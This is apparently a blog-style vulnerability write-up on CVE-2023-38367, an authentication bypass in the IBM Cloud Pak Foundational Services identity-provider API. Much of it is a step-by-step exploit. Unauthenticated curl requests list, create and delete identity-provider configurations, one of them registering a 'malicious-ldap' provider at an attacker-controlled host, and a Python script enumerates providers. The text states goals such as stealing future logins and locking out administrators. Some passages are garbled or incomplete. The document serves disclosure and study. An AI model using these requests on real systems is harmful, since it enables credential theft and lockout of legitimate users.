CVE-2023-38367 - How Unauthenticated Attackers Can Control IBM Cloud Pak Foundational Services IdP (with Exploit Details)

In mid-2023, IBM disclosed a critical security issue—tracked as CVE-2023-38367—in its Cloud Pak Foundational Services Identity Provider (IdP) API. Affecting a range of versions from 18.x through 22..2, this vulnerability lets anyone, without logging in, perform any action (like view, edit, create, or delete) on Identity Provider configurations. This means an attacker can take over authentication settings and, potentially, the entire Cloud Pak instance.

In this guide, we'll break down what CVE-2023-38367 is, how it works, who’s at risk, and what an actual exploit might look like. We'll finish up with how you can protect your systems.

What Is CVE-2023-38367?

CVE-2023-38367 is an *authentication bypass vulnerability* in the IdP API endpoint exposed by IBM Cloud Pak Foundational Services. Here’s what the official IBM security bulletin says:

> "IBM Cloud Pak Foundational Services Identity Provider (idP) API allows CRUD Operations with an invalid token. An unauthenticated attacker could view, update, delete or create an IdP configuration."

Impact: An attacker could hijack authentication flow or lock everyone out.

Affected Products (as per IBM X-Force ID 261130):

No authentication required: Anyone can hit the API, even without valid credentials.

- Critical scope: The IdP controls user logins; changing its config could let attackers in—or lock administrators out.

Let's get into how this vulnerability actually works

Normally, an API endpoint for sensitive actions (like changing authentication providers) should require strict authentication and privileged access checks. Instead, the affected endpoints are not verifying the tokens properly. Even if you present no or an invalid token, you'll be allowed to call the API and change IdP settings.

For most Cloud Pak installations, the endpoint looks like this

POST /idprovider/v1/auth/identity-providers
GET  /idprovider/v1/auth/identity-providers
PUT  /idprovider/v1/auth/identity-providers/{id}
DELETE /idprovider/v1/auth/identity-providers/{id}

Under normal security, each of these requires a valid access token (obtained via login), but with this CVE, these checks can be bypassed!

Exploiting CVE-2023-38367 (Step by Step)

Below is a step-by-step demonstration of exploiting this bug. Only test on systems you have permission to test!

If you know the host/IP of a vulnerable Cloud Pak install, the IdP API is usually on

https://<cloudpak-server>:<port>/idprovider/v1/auth/identity-providers

An unauthenticated attacker can *list* IdP configurations by simply

curl -k -X GET https://<cloudpak-server>/idprovider/v1/auth/identity-providers

Expected result (if vulnerable): Instead of denying access, the server returns JSON listing all configured identity providers.

To create a new IdP configuration (for example, a fake LDAP or SAML provider)

curl -k -X POST https://<cloudpak-server>/idprovider/v1/auth/identity-providers \
  -H "Content-Type: application/json" \
  -d '{
        "name": "malicious-ldap",
        "type": "ldap",
        "connection": {
          "host": "attacker-ldap.example.com",
          ...
        }
     }'

Delete an existing IdP configuration (replace {id} from the list command)

curl -k -X DELETE https://<cloudpak-server>/idprovider/v1/auth/identity-providers/{id}

Below is a small Python script to list all IdPs on a vulnerable server

import requests

url = "https://<cloudpak-server>/idprovider/v1/auth/identity-providers"

r = requests.get(url, verify=False)
if r.status_code == 200:
    print("[+] Success! IdPs found:")
    print(r.text)
else:
    print("[-] Server returned", r.status_code)

*Replace <cloudpak-server> with the actual Cloud Pak server address.*

Steal future logins (by pointing to an attacker-controlled LDAP or SAML instance)

- Delete all IdPs and lock out all legitimate users/admins
- Deny authentication to applications/workflows relying on the IdP service

How to Fix or Mitigate

Patches: IBM has released security fixes in later versions of Cloud Pak Foundational Services. See the original IBM advisory:
- IBM Security Bulletin for CVE-2023-38367

References & Further Reading

- IBM Security Bulletin CVE-2023-38367
- X-Force Vulnerability Database 261130
- Cloud Pak for Automation Documentation
- What is CRUD? (Wikipedia)

Final Thoughts

CVE-2023-38367 is a massive authentication failure bug that could allow any attacker to totally compromise identity management on IBM Cloud Pak Foundational Services. The only fix is to patch to a safe version. As always, never expose sensitive management APIs to the public internet and review logs for suspicious activity.

Timeline

Published on: 02/29/2024 02:15:09 UTC
Last modified on: 02/29/2024 13:49:29 UTC